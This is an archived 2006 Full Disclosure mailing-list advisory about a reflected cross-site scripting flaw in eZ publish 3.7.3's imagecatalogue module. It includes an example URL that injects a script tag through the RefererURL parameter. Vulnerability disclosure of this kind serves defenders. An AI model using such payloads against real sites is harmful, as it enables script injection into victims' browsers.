Full Disclosure mailing list archives
Advisory: eZ publish <= 3.7.3 (imagecatalogue module) XSS vulnerability
From: nukedx () nukedx com
Date: Sat, 25 Feb 2006 14:57:24 +0200
--Security Report-- Advisory: eZ publish <= 3.7.3 (imagecatalogue module) XSS vulnerability --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 25/02/06 01:43 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com Web: http://www.nukedx.com } --- Vendor: eZ systems (http://www.ez.no) Version: 3.7.3 and must be prior versions. About: Via this method remote attacker can make malicious links for clicking and when victim clicks this links victim's browser would be inject with XSS. Level: Harmless --- How&Example: ?ReferrerURL variable did not sanitized properly. GET -> http://[site]/[ezdir]/imagecatalogue/imageview/475/?RefererURL=">[XSS] EXAMPLE -> http://[site]/[ezdir]/imagecatalogue/imageview/475/?RefererURL="><script>alert('X');</script><link%20href=" -- Timeline: * 25/02/2006: Vulnerability found. * 25/02/2006: Contacted with vendor and waiting reply. -- Original advisory: http://www.nukedx.com/?viewdoc=16 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Advisory: eZ publish <= 3.7.3 (imagecatalogue module) XSS vulnerability nukedx (Feb 25)